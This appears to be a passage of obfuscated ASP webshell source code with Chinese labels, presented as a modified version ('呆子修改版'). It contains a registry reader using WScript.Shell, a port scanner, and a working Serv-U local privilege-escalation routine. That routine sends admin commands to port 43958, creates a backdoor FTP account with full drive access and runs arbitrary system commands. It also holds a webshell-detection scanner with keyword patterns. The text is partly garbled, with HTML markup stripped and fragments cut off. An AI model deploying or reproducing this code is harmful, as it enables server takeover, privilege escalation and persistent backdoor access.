\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}
" rRs "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}
" RRs "-----------OVER--------------------
" rRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网卡}
" rRs "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的序列(把上面的替换)}
" Rrs "" rrs "
" If reQuEST("thePath")<>"" thEn oN erroR ReSuME neXT set wsX = SErvEr.createObJEct("WScript.Shell") ThEPATH=requeSt("thePath") theaRray=wSX.RegrEaD(THepAtH) iF ISARray(tHEarrAY) ThEn foR i=0 to UboUnd(theArray) rrs "
  • " & thEaRrAy(I) nEXt ELse rrS "
  • " & THEArrAY End IF END iF enD Sub sub ScanPORt() ServEr.SCripTtimeout = 7776000 If ReQuEST.foRm("port")="" tHEn pORTlISt="21,23,25,80,110,135,139,445,1433,3389,43958" eLse PortlISt=rEqUesT.fOrm("port") end iF iF reqUeST.fOrm("ip")="" tHen ip="127.0.0.1" ELSe Ip=rEqUEST.Form("ip") EnD If RRS"

    端口扫描器

    " Rrs"
    " rrS"

    Scan IP: " rRS" " rRs"
    Port List:" rrs"" rrs"

    " rRS"" rRS"" rrs"

    " if ReqUEst.Form("scan") <> "" THen timEr1 = tIMER RrS("扫描报告:
    ") TMp = SPLiT(rEqUeSt.foRm("port"),",") Ip = spLIT(rEQueSt.fORM("ip"),",") FOr Hu = 0 to ubounD(IP) If inSTR(Ip(HU),"-") = 0 thEn FOR I = 0 TO UBound(tmP) IF isNumERIC(TmP(I)) THen caLl ScaN(Ip(HU), TmP(I)) ElSe sEEkx = INstR(tmP(i), "-") IF SEEKx > 0 Then StarTn = leFT(TMp(i), sEeKX - 1 ) endN = RIghT(Tmp(i), LEn(tMp(i)) - seeKx ) if ISnUMERIc(starTn) ANd iSnUMerIc(EnDn) ThEN foR j = startn TO ENDn CalL ScAN(Ip(Hu), J) nEXt eLSE Rrs(staRTn & " or " & endn & " is not number
    ") END IF eLsE rrs(TMp(i) & " is not number
    ") enD If ENd IF NeXt elsE IpsTart = Mid(ip(hu),1,iNstrrev(ip(hU),".")) fOr xXx = MID(iP(HU),inSTRreV(Ip(Hu),".")+1,1) TO mID(ip(Hu),iNStR(IP(hu),"-")+1,lEn(iP(Hu))-iNsTr(IP(hu),"-")) fOr I = 0 to uBOund(TMP) if isnUMeric(tMp(i)) theN cALl sCaN(ipstART & XXX, tMp(I)) ELSe SeeKx = instR(TMp(I), "-") If seekx > 0 tHen STArtN = lefT(tMp(i), SEEkX - 1 ) ENdn = riGht(tMP(I), LeN(tMP(i)) - sEEkX ) iF isnumEriC(STARTN) AND isNUMeRIc(eNdn) THEN fOR J = STartn TO ENdN call SCaN(IpSTArT & xXx,J) nexT eLSE rrS(STarTn & " or " & endn & " is not number
    ") end if ELse rRS(tMP(i) & " is not number
    ") EnD IF eND If NExt NexT eNd IF NEXt TimER2 = timEr tHETIME=CsTr(INT(TimER2-TiMeR1)) rrs"
    Process in "&tHetImE&" s" END IF enD SuB suB sCAN(TArGeTIP, poRtnuM) ON eRROr RESUme NEXT seT coNn = sErVer.crEATeObJECt("ADO" & "DB." & "con" & "nec" & "tio" & "n") cOnnstr="Provider=SQLOLEDB.1;Data Source=" & TarGetiP &","& PORTNUM &";User ID=lake2;Password=;" cONN.CoNNECTioNtIMEoUt = 1 conn.oPen cONNSTr If Err tHeN IF Err.NumBer = -2147217843 OR Err.nUmBer = -2147467259 then IF InsTR(eRr.dESCrIPTIoN, "(Connect()).") > 0 theN rrS(taRgeTip & ":" & poRTNuM & ".........关闭
    ") Else rRS(tArGetip & ":" & poRtnuM & ".........开放
    ") END If ENd iF eNd If ENd sub SelEct cAsE acTioN Case "MainMenu":MainMenu() Case "getTerminalInfo":getTerminalInfo() Case "PageAddToMdb":PageAddToMdb() case "ScanPort":ScanPort() case "CreateMdb" Case "Servu" sUaCTioN=ReqUEsT("SUaction") IF Not isnUmErIC(SUACtiON) thEN ResPONsE.enD uSER = TRIm(rEQuEST("u")) PaSs = TRiM(REQUesT("p")) pOrt = tRiM(REqUEST("port")) cMd = TRiM(reqUEST("c")) F=TRIM(ReqUEsT("f")) iF f="" theN F=GpATH() ELSe f=LeFT(f,2) eNd if fTPPORT = 65500 tIMeout=3 lOGinUSer = "User " & usEr & vBcrlf lOgInPass = "Pass " & PasS & vbcrlF dEldOMaIn = "-DELETEDOMAIN" & VBcrlF & "-IP=0.0.0.0" & vBCrlf & " PortNo=" & fTPpORt & vbcRlF Mt = "SITE MAINTENANCE" & vbCrLF neWDOmain = "-SETDOMAIN" & VbCrlf & "-Domain=goldsun|0.0.0.0|" & ftPpoRt & "|-1|1|0" & vBCRLF & "-TZOEnable=0" & VbCrLF & " TZOKey=" & VbcrLF nEWusEr = "-SETUSERSETUP" & VBCrLF & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & FTpPoRT & vbcRlF & "-User=go" & VbCrlF & "-Password=od" & vbCrlF & _ "-HomeDir=c:\\" & VbCRLf & "-LoginMesFile=" & vBcRlf & "-Disable=0" & Vbcrlf & "-RelPaths=1" & VbCrlF & _ "-NeedSecure=0" & VbcrLf & "-HideHidden=0" & VbCrLf & "-AlwaysAllowLogin=0" & VbCrLf & "-ChangePassword=0" & vBCRlF & _ "-QuotaEnable=0" & VbCrlF & "-MaxUsersLoginPerIP=-1" & VbcRLF & "-SpeedLimitUp=0" & VbcrLf & "-SpeedLimitDown=0" & VbcrLF & _ "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrLF & "-SessionTimeOut=-1" & VbCRlf & "-Expire=0" & vbcrlF & "-RatioUp=1" & VBCrLf & _ "-RatioDown=1" & vBCRlF & "-RatiosCredit=0" & vbCRlF & "-QuotaCurrent=0" & vBCRLf & "-QuotaMaximum=0" & VbCRlf & _ "-Maintenance=System" & VBCRlF & "-PasswordType=Regular" & vbCrlf & "-Ratios=None" & vbCrLF & " Access=c:\\|RWAMELCDP" & VBCrlf quIT = "QUIT" & VbCrlf newUsER=rEPlacE(neWuser,"c:",f) SElEct CAsE SuaCtiOn cASE 1 seT a=sERVER.crEATeobJect("Microsoft.XMLHTTP") a.opEN "GET", "http://127.0.0.1:" & PORT & "/goldsun/upadmin/s1",True, "", "" A.Send LoginUSER & lOginpaSS & mT & dELDOMain & NEWdoMAIn & nEWusER & qUIt SEt SesSioN("a")=a RRS"
    " rrs"" rrs"" RrS"" rRS"" RrS"" rrs"
    " rrs"" caSe 2 set b=sERVEr.CREateoBjeCt("Microsoft.XMLHTTP") b.opeN "GET", "http://127.0.0.1:" & FTPPoRt & "/goldsun/upadmin/s2", TRue, "", "" B.SeND "User go" & VbcRLf & "pass od" & VbcRLF & "site exec " & CMd & VBCRLF & QUiT sEt SEsSion("b")=B rrs"
    " RrS"" RrS"" rrs"" rRS"" RRs"" RRs"
    " RRS"" CAsE 3 set C=sERVEr.CREateobJEct("Microsoft.XMLHTTP") a.OPen "GET", "http://127.0.0.1:" & PoRt & "/goldsun/upadmin/s3", tRue, "", "" A.sEnD LOGINuSer & LOgInPAss & MT & DeldOMAIN & QUIT set SEssiOn("a")=a rRs"
    提权完毕,已执行了命令:
    "&CMD&"

    " RRS"" rrS"
    " CaSe eLSe on ErROr RESumE neXt SET A=SeSSIOn("a") sEt b=SESSION("b") sET c=SEsSIOn("c") a.aBOrt SEt A = noThing B.aBORT sET b = NOtHInG c.aBORt sET c = NOThiNG RRs"
    " rRS"" RrS"" rrS"" RRs"" RRS"" rrs"" Rrs"" rrs"" rrS"" rrs"" rrS"" rRS"" RRS"" rRs"" rrs"" rrs"" rrs"" RrS"" rRs" " RrS" " RRs" " RRs" " rRs" " rrS" " rRS" " RRS" " RRS"
    Serv-U 提升权限 呆子修改版
    用户名:
    口 令:
    端 口:
    系统路径:
    命 令:
    " rrs"" Rrs"
    " ENd sElECT FunCtiOn gpAtH() ON erROR REsUMe next Err.CleaR Set f=sERver.cREateOBJECt("Scripting.FileSystemObject") if err.nUmBer>0 THeN gpATh="c:" eXIt fUncTioN eND IF GpaTH=F.gEtsPECialFoldER(0) GpAth=LcASe(leFT(GpatH,2)) SET F=NothInG END FUNcTIon caSe "kmuma" DIM rEpORT If REQUEst.quEryStriNg("act")<>"scan" tHen rRs ("网站根目录- "&sErveR.mAppATH("/")&"
    ") Rrs ("本程序目录- "&seRVER.MAPPaTH(".")) RrS "
    " rrS "

    填入你要检查的路径:" RrS " 填“\”网站根目录;“.”为本程序目录

    " rrS "你要干什么: 查ASP 马" Rrs "搜索符合条件之文件
    " RrS "

    " RRs "  查找内容:" RRS " 要查找的字符串,不填就只进行日期检查
    " rRS "  修改日期: 多个日期用;隔开,任意日期填写 ALL
    " rRS "  文件类型: 类型之间用,隔开,*表示所有类型

    " RRS "" rrs "
    " eLSe IF rEQUeSt.FORm("path")="" THen rrS("路径不能为空") REsPOnSe.end() eNd IF IF ReqUEsT.ForM("path")="\" TheN TmPPaTh = seRVER.MaPpaTH("\") eLSEIF reqUesT.FoRM("path")="." tHen TmpPath = sERveR.MAppATH(".") Else TMPPaTh = ReQUEST.FoRm("path") ENd if tIMER1 = TIMeR Sun = 0 sumfilEs = 0 SumFOLderS = 1 iF rEquesT.FORM("radiobutton") = "sws" THen DiMfiLEEXt = "asp,cer,asa,cdx" CAll ShowAllFiLe(TmpPAtH) eLse if REqueST.FOrM("path") = "" Or rEqUEsT.forM("Search_Date") = "" or rEqUeST.FOrM("Search_FileExt") = "" thEn rrs("缉捕条件不完全

    请返回重新输入") reSPONSE.End() ENd iF diMfILEExt = reQUeST.FOrM("Search_fileExt") CAlL ShowaLlFiLE2(TmppATH) EnD if rRS "" rrS "" Rrs "" SUn = sUN + 1 TEmP="-=| 同上 |=-" EnD IF IF INStr( FILetXt, lcAsE("She"&domYBEsT&"ll.Application") ) oR InSTr( FilETXt, lcAsE("clsid:13709620-C27"&doMyBEst&"9-11CE-A49E-444553540000") ) THEn RePoRT = REPoRT&"" SUN = SUn + 1 tEMP="-=| 同上 |=-" End if Set reGEX = new reGeXP rEGeX.IgNORecASE = true regeX.gloBAL = TrUE regex.pAtTerN = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b" If RegEx.tESt(FILeTxt) THen rePoRT = rEPoRT&"" SUN = sun + 1 TEMP="-=| 同上 |=-" ENd If Regex.PatTern = "\bEv"&"al\b" if ReGEx.TESt(fILETXt) THeN RepORT = rEpoRT&"" sun = SUn + 1 TEMP="-=| 同上 |=-" ENd IF REGex.PattErN = "[^.]\bExe"&"cute\b" If REGex.TesT(fiLetxT) ThEN RepOrt = RepoRT&"" sun = Sun + 1 temP="-=| 同上 |=-" enD iF rEGex.paTTern = "\.(Open|Create)TextFile\b" iF REgeX.TeSt(filETXt) then RePoRT = REpOrT&"" sUn = sUN + 1 temp="-=| 同上 |=-" end IF rEgEx.PATterN = "\.SaveToFile\b" IF rEGEx.tESt(fiLETXT) ThEn RePORt = rEporT&"" Sun = sun + 1 tEmP="-=| 同上 |=-" ENd if reGEx.PatTerN = "\.Save\b" if regEx.TEsT(fIlETxt) then REPORT = rePORt&"" SUn = sUN + 1 Temp="-=| 同上 |=-" eND IF sEt reGeX = NothIng sET ReGex = NEw reGexp regEx.IGNorEcASE = True REgeX.GloBal = tRUE ReGEx.PAtTErN = "
    Scan WebShell -- 呆子修改版
    " RRS "
    " rrs "扫描完毕!一共检查文件夹"&SumfoLDers&"个,文件"&SUMfiLes&"个,发现可疑点"&SuN&"个" rRS "" If REqUeSt.ForM("radiobutton") = "sws" thEN rrS "" rRS "" RRs "" RRs "" eLsE Rrs "" RRs "" rrs "" enD iF RRS "" rrS rEporT RRs "
    文件相对路径特征码描述创建/修改时间文件相对路径文件创建时间修改时间
    " timeR2 = tiMER thETIme=csTr(iNT(((TImEr2-TimEr1)*10000 )+0.5)/10) RrS "
    本页执行共用了"&tHetIME&"毫秒" eND iF sUB ShOwaLLfIlE(paTh) set f1SO = cReAteobjecT("Scripting.FileSystemObject") IF noT f1SO.FOldERExISTs(path) TheN exiT sUb SET f = f1so.GeTFoLDEr(PaTh) set fc2 = f.fiLeS fOR eacH MYFIle In FC2 IF CHeCkexT(f1so.gEtEXTEnsiONNaMe(path&"\"&MyfIle.nAmE)) theN caLL sCANfILe(Path&TeMp&"\"&mYfILe.NAme, "") SuMfiLes = SumFiLeS + 1 eNd IF next sEt FC = f.SuBFOLderS for EAch F1 in fC shoWallFiLE PaTh&"\"&f1.nAmE sUMFoldeRs = sUmFoldeRs + 1 nEXT set f1SO = nOtHing EnD sub sUb ScAnFILe(fIlepAth, infILE) ServER.scrIptTIMEouT=999999999 IF INfIlE <> "" tHeN InFIleS = "该文件被"& InFiLE & "文件包含执行" EnD IF sEt fSo1s = cReAtEoBjEct("Scripting.FileSystemObject") on eRror rESuMe nexT seT oFIle = Fso1s.oPentExtfIle(FilePATh) FilEtXt = lcase(OFILe.READAll()) If err tHEn EXIT suB End if IF LeN(filETxT)>0 theN FiLETxt = vBCrlF & fILeTxT tEMp = ""&REPlacE(FILePatH,SeRveR.mAPpAtH("\")&"\","",1,1,1)&"
    " TeMp=TEmP&"编辑 " TeMP=TEmp&"删除 " TeMP=TemP&"复制 " TEMp=tEMP&"移动" if INsTr( fileTxT, lCasE("WScr"&doMYBest&"ipt.Shell") ) OR instr( Filetxt, LcasE("clsid:72C24DD5-D70A"&DomYBesT&"-438B-8A42-98424B88AFB8") ) THEn rePorT = RePOrt&"
    "&teMp&"WScr"&doMYBesT&"ipt.Shell 或者 clsid:72C24DD5-D70A"&dOmybeST&"-438B-8A42-98424B88AFB8危险组件,一般被ASP木马利用"&INFIlEs&""&GEtDatECrEAtE(fiLEPATH)&"
    "&GetdAtemoDiFY(fIlePAtH)&"
    "&TEMP&"She"&DOmyBEst&"ll.Application 或者 clsid:13709620-C27"&domybEsT&"9-11CE-A49E-444553540000危险组件,一般被ASP木马利用"&INFilES&""&gEtdaTECREATE(FilePaTH)&"
    "&gETDATEModIfy(fIlEpAth)&"
    "&TEmP&"(vbscript|jscript|javascript).Encode似乎脚本被加密了"&inFIlES&""&GETDatecreAtE(FilepAtH)&"
    "&GetDaTEModIFY(FIlEpatH)&"
    "&teMP&"Ev"&"ale"&"val()函数可以执行任意ASP代码
    但是javascript代码中也可以使用,有可能是误报。"&iNfILes&"    		"&getDateCreATe(fIlepatH)&"
    "&GeTDAtEMoDIfy(FilepATh)&"
    "&TemP&"Exec"&"utee"&"xecute()函数可以执行任意ASP代码
    "&iNfilES&"    		"&gEtDatEcReaTe(FiLEpaTh)&"
    "&GeTdAteMOdIfY(fiLepAtH)&"
    "&teMp&".CreateTextFile|.OpenTextFile使用了FSO的CreateTextFile|OpenTextFile读写文件"&INFiLEs&""&gETdateCreate(FiLEpAtH)&"
    "&GetdatEMODIFy(FIlepatH)&"
    "&tEmp&".SaveToFile使用了Stream的SaveToFile函数写文件"&iNfIlEs&""&geTDAtECREate(fiLePaTH)&"
    "&gEtdATEmodIfY(filepath)&"
    "&tEMp&".Save使用了XMLHTTP的Save函数写文件"&InfILES&""&geTdateCReatE(FILepAth)&"
    "&gETDAteMoDiFy(FIlEpAth)&"